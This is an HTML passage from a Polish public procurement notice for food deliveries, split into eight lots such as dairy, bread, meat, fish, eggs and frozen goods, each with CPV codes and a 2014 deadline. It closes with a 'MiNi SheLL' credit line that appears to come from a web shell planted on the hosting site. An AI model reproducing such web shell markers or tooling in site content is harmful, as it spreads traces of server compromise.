  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 2 (formularzu
  cenowym zadania Nr 1)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.62.00.00-0, 15.41.11.00-3, 15.13.13.10-1, 15.61.00.00-7, 15.30.00.00-1, 15.83.00.00-5, 15.85.11.00-9, 15.86.00.00-4, 15.87.00.00-7, 15.88.00.00-0, 15.89.00.00-3, 15.84.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie Nr 2 - dostawy artykułów mleczarskich zgodnie z formularzem cenowym stanowiącym  Zał. Nr 3 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- śmietana  (CPV 15512000-0) : śmietany 18%,
- mleko w proszku (CPV 15511700-0) : mleko w proszku,
- masło (CPV 15530000-2) : masła świeżego,
- margaryna  (CPV 15431100-9) : margaryny do smarowania, mixu tłuszczowego,
- jogurt bez dodatków substancji smakowych  (CPV 15551310-1) : jogurtów
  naturalnych,
- jogurt z dodatkiem substancji smakowych (CPV 15551320-4) : jogurtów owocowych, deserów,
- klasyfikowane produkty mleczarskie (CPV  15550000-8) : kefiru,
- maślanka  (CPV  15551500-0) : maślanki,
- pasty serowe do smarowania  (CPV 15545000-0) : serków homogenizowanych
  waniliowych i owocowych, serka wiejskiego i serów topionych,
- ser  twardy (CPV 15544000-3) : sera twardego gouda i edamskiego,
- ser twarogowy  (CPV 15542100-0) : twarogu półtłustego.  
                                                                        
  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 3 (formularzu 
  cenowym zadania Nr 2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.20.00-0, 15.51.17.00-0, 15.53.00.00-2, 15.43.11.00-9, 15.55.13.10-1, 15.55.13.20-4, 15.55.00.00-8, 15.55.15.00-0, 15.54.50.00-0, 15.54.40.00-3, 15.54.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie Nr 3 - dostawy pieczywa zgodnie z formularzem cenowym stanowiącym  Zał. Nr 4 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą  artykułów :
- chleb  (CPV 15811100-7) : chleba zwykłego, chleba graham, chleba słonecznikowego,  
- bułeczki (CPV 15811400-0) : bułeczki pszenne, bułeczki graham.     
                                              
  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 4 (formularzu
  cenowym zadania Nr 3)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.11.00-7, 15.81.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie Nr 4 - dostawy artykułów ciastkarskich i ciast  zgodnie z formularzem cenowym stanowiącym  Zał. Nr 5 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- wyroby ciastkarskie  (CPV 15812100-4) : bułek drożdżowych z budyniem, serem, 
   jabłkami, jagodami oraz pączków,
- ciasta (CPV 15812200-5) : ciast drożdżowych z makiem, ciast drożdżowych z serem, strucli makowej, babki piaskowej, piernika z jabłkami.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 5 (formularzu
  cenowym zadania Nr 4)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.21.00-4, 15.81.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zadanie Nr 5 - dostawy mięsa i wędlin zgodnie z formularzem cenowym stanowiącym  Zał. Nr 6 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- drób (CPV 15112000-6) : kurczaka świeżego, filetów świeżych z kurczaka, korpusów
   mrożonych z kurczaka, udek świeżych z kurczaka,świeżego mięsa gulaszowego 
   z kurczaka
- podroby  (CPV 15114000-0) : świeżych wątróbek i żołądków z kurczaka,
- wieprzowina (CPV 15113000-3) : świeżej słoniny, świeżej łopatki wieprzowej z/k, 
   świeżego schabu z/k, świeżej karkówki z/k ,
- mięso wołowe  (CPV 15111000-9) : świeżego karku wołowego z/k, świeżej łopatki 
   wołowej z/k,
- wędliny drobiowe (CPV 15131135-0) : pasztetu drobiowego, parówki drobiowej 
   (cienkiej), batonu drobiowego, polędwicy drobiowej, baleronu z indyka,
- produkty wieprzowe (CPV 15131400-9) : kiełbasy : krakowskiej, szynkowej,
  toruńskiej, wiejskiej, zwyczajnej, pieczeni rzymskiej, pieczeni tyrolskiej, szynki wiejskiej, kaszani, kiszki pasztetowej, salcesonu włoskiego, salcesonu wiejskiego, boczku wędzonego.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 6 (formularzu
  cenowym zadania Nr 5)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.20.00-6, 15.11.40.00-0, 15.11.30.00-3, 15.11.10.00-9, 15.13.11.35-0, 15.13.14.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zadanie Nr 6 - dostawy artykułów rybnych zgodnie z formularzem cenowym stanowiącym  Zał. Nr 7 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- ryby przetworzone i konserwowane  (CPV 15200000-0) : filetów, płatów mrożonych 
  z : morszczuka, mintaja, mrożonych kostek z mintaja, makreli wędzonej, śledzi solonych Matjas (filety), śledzi w oleju (filety), konserw rybnych : paprykarz szczeciński, śledź w pomidorach, filet z makreli w oleju, filet z makreli w pomidorach.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 7 (formularzu
  cenowym zadania Nr 6)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zadanie Nr 7 - dostawy  jaj  zgodnie z formularzem cenowym stanowiącym  Zał. Nr 8 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- jaja (CPV  03142500-3) : jaj kurzych.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 8 (formularzu
  cenowym zadania Nr 7)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> zadanie Nr 8 - dostawy mrożonek zgodnie z formularzem cenowym stanowiącym  Zał. Nr 9 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- warzywa mrożone (CPV 15331100-8) : mieszanki warzywnej, marchwi kostka, marchwi z groszkiem, kalafiora, fasolki szparagowej,
- owoce przetworzone (CPV 15332100-5) : mieszanki kompotowej mrożonej.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 9 (formularzu
  cenowym zadania Nr 8)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.00-8, 15.33.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com